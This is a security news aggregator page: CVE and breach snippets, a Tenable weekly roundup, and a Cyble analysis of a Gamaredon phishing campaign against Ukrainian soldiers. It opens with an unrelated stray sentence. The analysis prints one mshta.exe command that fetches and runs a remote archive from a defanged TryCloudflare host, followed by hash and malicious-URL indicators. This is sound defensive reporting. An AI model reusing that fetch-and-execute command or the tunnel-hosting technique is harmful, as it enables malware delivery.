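
The point of the model is where the check lives: authorizing the entry point is not enough once the client can influence which view is rendered, so the hardened dispatcher evaluates the resolved view's own access setting rather than trusting the controller's.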

by The Cyber Express

For the fourth time in the last five months, Apache OFBiz users have been advised to upgrade their installations to fix a critical flaw (CVE-2024-45195) that could lead to unauthenticated remote code execution.

About CVE-2024-45195

Apache OFBiz is an open-source suite for enterprise resource planning (ERP), which contains web applications for human resources management, customer relationship management, accounting, marketing, etc. “Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have … More → The post Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195) appeared first on Help Net Security.

by Help Net Security

While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.

by Cisco Talos Blog

Effective DevOps infrastructure management is key to accelerating development cycles, enhancing collaboration, and maintaining security while aligning with organizational goals and customer needs.

by ITPro Today

Ongoing gaps in the U.S. cybersecurity workforce that have left nearly half a million jobs unfilled have prompted the Office of the National Cyber Director to introduce the new Service for America cyber hiring sprint that would link jobseekers to cyber jobs within the next two months.

by SC Media

Researchers and the TSA have different views on the impact of vulnerabilities in an airport security application that could allegedly allow the bypass of certain airport security systems. The post CISA Breaks Silence on Controversial ‘Airport Security Bypass’ Vulnerability appeared first on SecurityWeek.

by SecurityWeek

Zero-trust implementation has been 87% completed across federal agencies on average ahead of the September 30 deadline.

by SC Media

Such a vulnerability evades fixes issued for previous OFBiz bugs, tracked as CVE-2024-38856, CVE-2024-36104, and CVE-2024-32113, all of which have resulted from a fragmentation issue within the controller-view map that could allow unauthenticated remote code or SQL query execution, according to Rapid7 security researchers.

by SC Media

Telegram CEO Pavel Durov has broken his silence nearly two weeks after his arrest in France, stating the charges are misguided. "If a country is unhappy with an internet service, the established practice is to start a legal action against the service itself," Durov said in a 600-word statement on his Telegram account. "Using laws from the pre-smartphone era to charge a CEO with crimes committed

by The Hacker News

Exploitation of the flaw, which stems from LiteSpeed Cache's debug logging functionality, could be conducted by attackers with '/wp-content/debug.log' file access to exfiltrate users' session cookies, spoof admin users, and take over websites.

by SC Media

Individuals' full names, birthdates, phone numbers, ID numbers, email addresses, home addresses, vehicle identification numbers, car brands and models, engine numbers, and vehicle colors were leaked by the unsecured Elasticsearch instance.

by SC Media

Threat actors could leverage CVE-2024-20439 via static credentials to facilitate the compromise of targeted systems with administrative privileges while intrusions involving CVE-2024-20440 could enable the acquisition of log files with credentials and other sensitive details.

by SC Media

SonicWall is warning that a recently fixed access control flaw tracked as CVE-2024-40766 in SonicOS is now "potentially" exploited in attacks, urging admins to apply patches as soon as possible. [...]

by BleepingComputer

Immediate withdrawal and deposit takedowns, as well as notifications to the FBI's Internet Crime Complaint Center and the Singaporean police have been conducted by Penpie following the theft on Tuesday.

by SC Media

We’re focused on… Developments in quantum cryptography.

Why? Because a breakthrough by scientists at Oxford University Physics, announced in April 2024, has taken us a step closer to the possibility of individuals and companies leveraging the power of quantum computing – by guaranteeing privacy and security. The breakthrough was laid out in a study, published in the journal Physical Review Letters.

One of the lead researchers, Professor David Lucas, said in a statement: “Never in history have the issues surrounding privacy of data and code been more urgently debated than in the present era of cloud computing and artificial intelligence. As quantum computers become more capable, people will seek to use them with complete security and privacy over networks, and our new results mark a step change in capability in this respect.”

Where does the urgency behind quantum security come from?

When we interviewed cryptography expert Ahmad Almorabea (Senior Penetration Testing Consultant at TCC), we asked if he thinks there’s a risk that industries and governments will be too slow to implement quantum-safe cryptography before quantum computing technology becomes more accessible on open markets.

“Yes, there’s a risk,” he said. “Quantum computing’s advancement could potentially break current encryption methods.”

“If industries/governments don’t act swiftly to adopt quantum-safe cryptography, sensitive data could be vulnerable in the future. And there are many aspects in cryptography that could be broken, while Quantum computing advances (i.e. key derivation, encryption algorithms, PKI and more).”

Speaking on the developments in quantum cryptography that he was particularly optimistic about, Almorabea added: “I believe cryptographic algorithms will be able to search in encrypted texts without the need for understanding the actual texts available. And it’s a big step towards having our privacy back.

“I’m excited about the improvement happening in cryptographic algorithms using AI. In scenarios where learning models need to be applied on sensitive data, AI cryptography plays a vital role in preserving privacy.”

What does the new Oxford University Physics research show?

Right now, quantum computing has to operate within highly controlled conditions in order to remain stable – and there are growing concerns about how quickly quantum computing could break existing security and encryption systems.

The new study shows that quantum computing in the cloud can be accessed in a way that’s both scalable and practical, and that gives users complete data privacy and security – along with the ability to verify the authenticity of data. They used an approach called ‘blind quantum computing’, which connects two completely separate quantum computing entities (which could, for example, be a person at home accessing a cloud server) in a secure way.

Using a combination of quantum memory and photons, researchers developed a system made up of a fibre network link between a server and a device detecting photons, at an independent computer that remotely accesses its cloud services.

Study co-lead Dr Peter Drmota said: “Using blind quantum computing, clients can access remote quantum computers to process confidential data with secret algorithms and even verify the results are correct, without revealing any useful information. Realising this concept is a big step forward in both quantum computing and keeping our information safe online.”

Ultimately, this could enable commercial development of quantum-enabled devices. Through blind quantum computing, secure devices that safeguard data when users access cloud quantum computing services could be scalable for commercial markets.

P.S. - Mark your calendars for the return of Black Hat MEA in November 2024. Want to be a part of the action? Register now!

by HACKLIDO

Cybersecurity teams must beware of RansomHub, a surging RaaS gang. Plus, North Korea has unleashed sophisticated social-engineering schemes against crypto employees. Meanwhile, a new SANS report stresses the importance of protecting ICS and OT systems. And a Tenable poll sheds light on cloud-native VM. And much more!

Dive into six things that are top of mind for the week ending September 6.

1 - CISA: Keep RansomHub RaaS gang on your radar screen

RansomHub, a relatively new ransomware group, has become a serious threat as its successful ransomware-as-a-service (RaaS) model increasingly lures prominent affiliates away from competitors like LockBit.

That’s the warning from CISA, which urges cyber teams to protect their organizations by keeping software updated, adopting phishing-resistant multi-factor authentication and training employees to recognize phishing attacks.

In an advisory titled “#StopRansomware: RansomHub Ransomware,” CISA details the RaaS gang’s tactics, techniques and procedures, as well as its indicators of compromise, and offers mitigation recommendations. RansomHub and its affiliates have successfully attacked at least 210 organizations from a wide variety of industries, including from multiple critical infrastructure sectors.

Highlights from the advisory include:

- RansomHub affiliates use double extortion, meaning they encrypt victims’ systems and exfiltrate their data.
- Preferred initial-access targets include internet-exposed systems and endpoints, while its go-to attack methods are phishing emails, known-vulnerability exploitation and password spraying.
- These known vulnerabilities have been exploited: CVE-2023-3519, CVE-2023-27997, CVE-2023-46604, CVE-2023-22515, CVE-2023-46747, CVE-2023-48788, CVE-2017-0144, CVE-2020-1472 and CVE-2020-0787.

Recommended mitigation measures include:

- Adopt a recovery plan for storing critical data in locations that are physically separate, segmented and secure.
- Back up data offline and encrypt it.
- Enforce strong-password requirements.
- Maintain all operating systems, software and firmware updated.
- Protect administrator accounts with phishing-resistant MFA, least-privilege principles and time-based access, like the just-in-time access method.
- Segment networks and monitor them for unusual and suspicious activity.
- Check for unrecognized accounts in domain controllers, servers, workstations and directories.

Previously known as Cyclops and Knight, RansomHub was launched in February of this year and ranked as the most active ransomware group in July with 11% of all attacks, according to NCC Group.

The FBI, the Multi-State Information Sharing and Analysis Center (MS-ISAC) and the Department of Health and Human Services (HHS) partnered with CISA on this advisory.

For more information about ransomware trends and security best practices:

- “Ransomware Is ‘More Brutal’ Than Ever in 2024” (Wired)
- “How Can I Protect Against Ransomware?” (CISA)
- “How to prevent ransomware in 6 steps” (TechTarget)
- “Steps to Help Prevent & Limit the Impact of Ransomware” (Center for Internet Security)
- “Ransomware: How to prevent and recover” (Canadian Centre for Cyber Security)

2 - FBI: North Korean hackers go after crypto players

Using intricate, persistent and stealthy social-engineering schemes, North Korea’s government is targeting staffers at crypto organizations to steal cryptocurrency by breaching their networks using malware.

Specifically, hackers acting on behalf of North Korea’s government have their sights set on organizations that offer cryptocurrency exchange-traded funds (ETFs) and other crypto-based financial products.

That’s according to the FBI, which this week issued an alert for companies in the cryptocurrency sector titled “North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks.”

“North Korea employs sophisticated tactics to steal cryptocurrency funds and is a persistent threat to organizations with access to large quantities of cryptocurrency-related assets or products,” reads the FBI alert.

Tactics employed by these North Korean hackers include:

- Conducting thorough and detailed research on employees of the crypto organizations they intend to target
- Creating elaborate fake offers such as employment and investment opportunities that are tailored for each targeted individual
- Interacting extensively one-on-one with the victims, often impersonating real people, such as recruiters
- Requesting to:
  - Execute code or download apps on company-owned devices
  - Conduct “pre-employment” technical tests or exercises involving the execution of packages and scripts
  - Run a script in order to enable voice calls or video meetings

Among the FBI’s recommended mitigations are:

- Develop methods to verify a contact’s identity.
- Don’t keep crypto-wallet information, such as logins and passwords, in devices connected to the internet.
- Decline to take pre-employment tests or to execute code on company-owned devices.
- Conduct multiple authentication checks and require approvals from unconnected networks before carrying out financial transactions.

For more information about crypto hacking trends:

- “Crypto hacking thefts double to $1.4 bln in first half of 2024” (Reuters)
- “Can Crypto Be Hacked?” (Investopedia)
- “2024 Crypto Crime Mid-year Update Part 1 and Part 2” (Chainalysis)
- “The 6 biggest crypto heists of all time” (Quartz)
- “Indian crypto platform WazirX confirms $230 million stolen during cyberattack” (The Record)

3 - Tenable surveys webinar attendees on cloud-native VM

During our recent webinar “A Cyber Pro's Guide to Cloud-Native Vulnerability Management,” we polled attendees about issues related to cloud VM and cloud-native technologies. See what they said about their cloud-native application challenges and cloud VM strategies!

(62 webinar attendees polled by Tenable, August 2024)

(49 webinar attendees polled by Tenable, August 2024)

Want to learn more about the benefits of agentless cloud security and about extending your VM strategy to the cloud? Watch the on-demand webinar “A Cyber Pro's Guide to Cloud-Native Vulnerability Management” today.

4 - SANS: Businesses can’t ignore security of ICS and OT

Looking for insights and best practices to boost the cybersecurity of your industrial control systems (ICS) and operational technology systems (OT)? You might want to check out SANS Institute’s new guide "ICS Is the Business: Why Securing ICS/OT Environments Is Business-Critical in 2024."

The guide stresses that protecting ICS and OT systems is essential for business success and that to secure ICS and OT systems you can’t use the same strategy, processes and tools you employ to protect the IT environment.

“The steps outlined here are essential for ensuring that our industrial systems continue to operate safely and reliably,” author Dean Parsons, a SANS Certified Instructor, said in a statement.

Topics covered in the paper include:

- An overview of the top threats impacting ICS and OT systems, including targeted, tailored strikes against these environments; ransomware attacks; supply chain breaches; and attacks that originate in the IT network.
- The differences between IT and ICS/OT environments, and why they require a different security approach.
- Five critical cybersecurity controls for ICS/OT:
  - ICS-specific incident response
  - Network architecture that supports defensible controls, like segmentation and log collection
  - ICS network visibility and monitoring
  - ICS secure remote access
  - Risk-based ICS vulnerability management
- How to use AI to bolster ICS/OT security.
- The ways in which CISOs can advance their organizations’ ICS/OT security maturity.

For more information about OT security, check out these Tenable resources:

- “Unlock Advanced IoT Visibility in your OT Environment Security” (on-demand webinar)
- “How To Secure All of Your Assets - IT, OT and IoT - With an Exposure Management Platform” (blog)
- “Securing The Manufacturing Shop Floor” (white paper)
- “Fortifying Your OT Environment: Vulnerability and Risk Mitigation Strategies” (on-demand webinar)
- “CISA Finding: 90% of Initial Access to Critical Infrastructure Is Gained Via Identity Compromise. What Can You Do About It?” (blog)

5 - Cybersecurity among top techs getting an AI boost

Cybersecurity ranks high among the technologies into which organizations are integrating AI in order to beef up their tech stacks’ capabilities and improve IT productivity.

That’s according to CompTIA’s “Building AI Strategy” report, based on a survey of 511 tech and business pros in North America.

When respondents were asked which of their tech initiatives are incorporating AI, cybersecurity came in third, mentioned by 61%, behind automation (67%) and data analysis (63%).

“In these (three) cases, AI can understand a wide variety of inputs related to the problem at hand, then provide various forms of assistance, such as direct automation of certain tasks, suggestions of patterns found in data, or predictions of cyber attacks,” the report reads.

Cybersecurity also made the list of respondents’ main concerns related to their use of AI in technology, ranking third. The top concern was finding the right interaction balance between AI tools and employees, followed by infrastructure costs for AI.

For more information about the intersection of AI and cybersecurity, check out these Tenable blogs:

- “How to Discover, Analyze and Respond to Threats Faster with Generative AI”
- “Securing the AI Attack Surface: Separating the Unknown from the Well Understood”
- “Never Trust User Inputs -- And AI Isn't an Exception: A Security-First Approach”
- “Do You Think You Have No AI Exposures? Think Again”
- “AI Is About To Take Cybersecurity By Storm: Here's What You Can Expect”

6 - U.S. government wants to boost security of internet routing

The technology that underpins the internet’s traffic routing is insecure – a dangerous weak link that cyberattackers are increasingly targeting and that represents a global cyber risk.

So said the White House, which is urging a variety of players, including government agencies, internet service providers, academia, mobile operators and cloud providers, to help address the problem.

The report “Roadmap To Enhancing Internet Routing Security” by the Office of the National Cyber Director was released this week and aims to foster the adoption of technologies that can make the ubiquitous Border Gateway Protocol (BGP) more secure.

“As initially designed and commonly operating today, BGP does not provide adequate security and resilience features for the risks we currently face,” the report reads. For example, BGP is unable to determine if messages exchanged between neighboring networks are authentic, nor can it verify that information from remote networks is legit. Over the past two decades, BGP’s design vulnerabilities have led to serious misconfiguration accidents, and opened the door for a variety of cyberattacks.

The good news is that initial techniques to boost BGP’s security and resilience have been introduced and standardized, and are being deployed, specifically security mechanisms based on Resource Public Key Infrastructure (RPKI), according to the document.

“This roadmap provides recommendations and guidance necessary to increase the adoption of these initial BGP security technologies across all network operators in the Internet ecosystem,” the report reads.

by Tenable

Key Takeaways Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails. The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system. This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe. The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection. The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples. The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign''s effectiveness. Executive Summary As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration. During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors. 
Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets. In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon sample observed since the start of August 2024. Figure 1 - Gamaredon Sample Observed in the Wild Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack.  Technical Details The campaign begins with a spear-phishing email bearing the subject ""ПОВІСТКА,"" which translates to ""summons."" The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below. Figure 1 - Gamaredon Sample Observed in the Wild Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, ""File uploaded to the ''DOWNLOADS'' folder."" Simultaneously, a RAR compressed folder is silently dropped into the system''s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message. Figure 3 - XHTML file The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. 
In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the ""onerror"" event. In some variants, it is activated through the ""onmousemove"" event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code. Figure 4 - XHTML Code The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript. Figure 5 - Deobfuscated JavaScript The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms. The Target command of the LNK file is mentioned below. “C:\Windows\System32\mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”  The figure below shows the property of the LNK file. Figure 6 - Property of LNK File We were unable to obtain the .tar files in our research. 
However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim's system.

Conclusion

The ongoing Gamaredon APT campaign demonstrates the group's persistence and evolving tactics in targeting Ukrainian military personnel. By combining spear-phishing emails, malicious XHTML attachments and obfuscated JavaScript, the attackers deliver their payloads while abusing TryCloudflare's account-free quick tunnels to host them. The scale and frequency of the campaign indicate a coordinated, mass phishing effort against sensitive Ukrainian entities.

Recommendations

The following recommendations mitigate the Gamaredon APT campaign:
Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content.
Implement email security solutions with advanced threat protection that filter phishing emails and malicious attachments; XHTML attachments are rare in legitimate mail and can be quarantined or stripped outright.
Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files.
Monitor for unusual network activity, including connections to *.trycloudflare.com and other unknown external resources. Few enterprise endpoints have a business need to reach TryCloudflare quick tunnels, so the domain is a reasonable candidate for blocking or alerting.
Use application whitelisting to allow only trusted applications and scripts to run, and restrict mshta.exe where it is not needed; mshta.exe launched with a URL argument is a high-fidelity detection.
Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare.

MITRE ATT&CK® Techniques

Tactic: Initial Access (TA0001)
Technique: Phishing: Spearphishing Attachment (T1566.001)
Procedure: Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel.

Tactic: Execution (TA0002)
Technique: User Execution: Malicious File (T1204.002)
Procedure: The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution.
Tactic: Execution (TA0002)
Technique: System Binary Proxy Execution: Mshta (T1218.005)
Procedure: mshta.exe is used to execute a remote file with a .tar name hosted on an abused TryCloudflare quick tunnel.

Tactic: Defence Evasion (TA0005)
Technique: Obfuscated Files or Information (T1027)
Procedure: The campaign uses obfuscated JavaScript hidden in the XHTML file, including random "*" characters inserted into Base64-encoded strings to avoid detection.

Indicators Of Compromise

Indicator  Type  Description
0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b  SHA256  XHTML
12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49  SHA256  XHTML
a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332  SHA256  XHTML
0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef  SHA256  XHTML
66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe  SHA256  XHTML
1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296  SHA256  XHTML
e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561  SHA256  XHTML
17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b  SHA256  XHTML
10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631  SHA256  XHTML
83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242  SHA256  XHTML
201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4  SHA256  XHTML
d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7  SHA256  XHTML
95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536  SHA256  XHTML
13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4  SHA256  XHTML
a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d  SHA256  XHTML
4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92  SHA256  XHTML
db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9  SHA256  XHTML
2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79  SHA256  XHTML
2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142  SHA256  XHTML
e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5  SHA256  XHTML
0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298  SHA256  XHTML
71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a  SHA256  XHTML
ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a  SHA256  XHTML
1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a  SHA256  XHTML
0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8  SHA256  XHTML
afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81  SHA256  XHTML
265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412  SHA256  XHTML
1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04  SHA256  XHTML
821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de  SHA256  XHTML
0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4  SHA256  XHTML
f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1  SHA256  XHTML
c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156  SHA256  XHTML
56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259  SHA256  XHTML
a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374  SHA256  XHTML
df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f  SHA256  XHTML
f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c  SHA256  XHTML
5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928  SHA256  XHTML
f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c  SHA256  XHTML
58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491  SHA256  XHTML
51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad  SHA256  XHTML
bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795  SHA256  XHTML
a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b  SHA256  XHTML
cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0  SHA256  XHTML
ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78  SHA256  XHTML
a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db  SHA256  XHTML
c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498  SHA256  XHTML
bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e  SHA256  XHTML
ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f  SHA256  XHTML
770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f  SHA256  XHTML
dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1  SHA256  XHTML
0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f  SHA256  XHTML
57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c  SHA256  XHTML
0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452  SHA256  XHTML
dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8  SHA256  XHTML
c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d  SHA256  XHTML
e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099  SHA256  XHTML
92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0  SHA256  XHTML
1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3  SHA256  XHTML
b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3  SHA256  XHTML
b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda  SHA256  XHTML
7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae  SHA256  XHTML
be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87  SHA256  XHTML
de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891  SHA256  XHTML
66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040  SHA256  XHTML
450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87  SHA256  XHTML
d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80  SHA256  XHTML
7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c  SHA256  XHTML
37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655  SHA256  XHTML
efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3  SHA256  XHTML
ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e  SHA256  XHTML
5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1  SHA256  XHTML
112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8  SHA256  XHTML
cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699  SHA256  XHTML
c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1  SHA256  XHTML
6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc  SHA256  XHTML
11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a  SHA256  XHTML
7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9  SHA256  XHTML
982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90  SHA256  XHTML
5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f  SHA256  XHTML
663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0  SHA256  XHTML
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar  URL  Malicious URL
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar  URL  Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regular/presence[.]tar  URL  Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/preceding/baron[.]tar  URL  Malicious URL
hxxps://tracked--radar-ni[.]trycloudflare[.]com/zgur/sensation/headstone[.]rar  URL  Malicious URL
hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf  URL  Malicious URL
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar  URL  Malicious URL
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar  URL  Malicious URL
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/decide/barn[.]tar  URL  Malicious URL
hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/seller[.]tar  URL  Malicious URL
hxxps://tracked--radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar  URL  Malicious URL
hxxps://tracked--radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar  URL  Malicious URL
hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/net[.]rar  URL  Malicious URL
hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar  URL  Malicious URL
hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/growth/days[.]tar  URL  Malicious URL
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/intake/bargain[.]tar  URL  Malicious URL
hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/bargain/barton[.]tar  URL  Malicious URL
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar  URL  Malicious URL
hxxps://tracked--radar-ni[.]trycloudflare[.]com/sudu/insufficient/neutral[.]rar  URL  Malicious URL
hxxps://tracked--radar-ni[.]trycloudflare[.]com/sudu/decide/quest[.]rar  URL  Malicious URL
